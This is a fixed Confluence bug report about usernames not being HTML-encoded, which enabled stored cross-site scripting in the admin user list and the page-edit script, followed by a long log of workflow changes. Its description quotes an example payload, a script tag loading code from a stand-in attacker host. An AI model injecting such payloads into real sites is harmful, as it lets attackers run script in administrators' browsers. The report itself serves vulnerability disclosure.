[CONFSERVER-7615] XSS bug: usernames not HTML-encoded in all places

Type: Bug
Resolution: Fixed
Priority: High
Fix Version/s: 2.9.1, 2.10
Affects Version/s: 2.2.9, 2.3
Component/s: None
Labels:

Bug Fix Policy:
View Atlassian Server bug fix policy

When signing up for an account, it is possible to enter a username like "<script src=http://drevil.com/xss>fred</script>". Confluence will accept this, and on certain pages, render it as raw HTML to the user, opening the possibility of cross-site scripting (XSS) attacks.

Two places I've spotted the raw HTML so far:

Most prominently, when an admin goes to Manage Users -> Show All Users, and the username displays in the list, the raw HTML is rendered.
When editing a page created by such a user, the togglePermissions() javascript will display it, breaking later tags:

if ($('edit-personal').checked) $('editPermission').value = "<script src=http://drevil.com/xss>fred</script>";

causes

CONFSERVER-13890 Tooltip showing number of attachments is showing for all items in the Browse menu

Closed

is blocked by

CONFSERVER-9627 Velocity does not automatically escape HTML entities when substituting variables

Closed

is related to

CONFSERVER-11002 viewuser.action has an XSS problem around username

Closed

Katherine Yabut made changes - 13/Nov/2018 4:41 AM

Workflow

Original: JAC Bug Workflow v3 [ 2887760 ]

New: CONFSERVER Bug Workflow v4 [ 2981478 ]

Owen made changes - 11/Oct/2018 8:53 AM

Workflow	Original: JAC Bug Workflow v2 [ 2801616 ]	New: JAC Bug Workflow v3 [ 2887760 ]
Status	Original: Resolved [ 5 ]	New: Closed [ 6 ]

Owen made changes - 29/Aug/2018 11:19 PM

Workflow

Original: JAC Bug Workflow [ 2732029 ]

New: JAC Bug Workflow v2 [ 2801616 ]

Owen made changes - 02/Jul/2018 7:08 AM

Workflow

Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2397321 ]

New: JAC Bug Workflow [ 2732029 ]

Katherine Yabut made changes - 22/Jun/2017 6:52 AM

Workflow

Original: Confluence Workflow - Public Facing - Restricted v5 [ 2294508 ]

New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2397321 ]

Katherine Yabut made changes - 31/May/2017 5:38 AM

Workflow

Original: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2230918 ]

New: Confluence Workflow - Public Facing - Restricted v5 [ 2294508 ]

Katherine Yabut made changes - 31/May/2017 4:59 AM

Workflow

Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2189461 ]

New: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2230918 ]

Katherine Yabut made changes - 31/May/2017 2:04 AM

Workflow

Original: Confluence Workflow - Public Facing - Restricted v5 [ 1920070 ]

New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2189461 ]

Katherine Yabut made changes - 03/Apr/2017 3:57 AM

Workflow

Original: Confluence Workflow - Public Facing - Restricted v3 [ 1729986 ]

New: Confluence Workflow - Public Facing - Restricted v5 [ 1920070 ]

Katherine Yabut made changes - 28/Feb/2017 6:34 AM

Workflow

Original: CONF Bug Subtask WF (TEMP) [ 1686063 ]

New: Confluence Workflow - Public Facing - Restricted v3 [ 1729986 ]

Assignee:: Chris Kiehl

Reporter:: Jeff Turner

Affected customers:: 0 This affects my team

Watchers:: 0 Start watching this issue

Created:: 10/Jan/2007 3:32 AM

Updated:: 11/Oct/2018 8:53 AM

Resolved:: 03/Sep/2008 1:21 AM

Details

Description

Attachments

Issue Links

Forms

Activity

People

Dates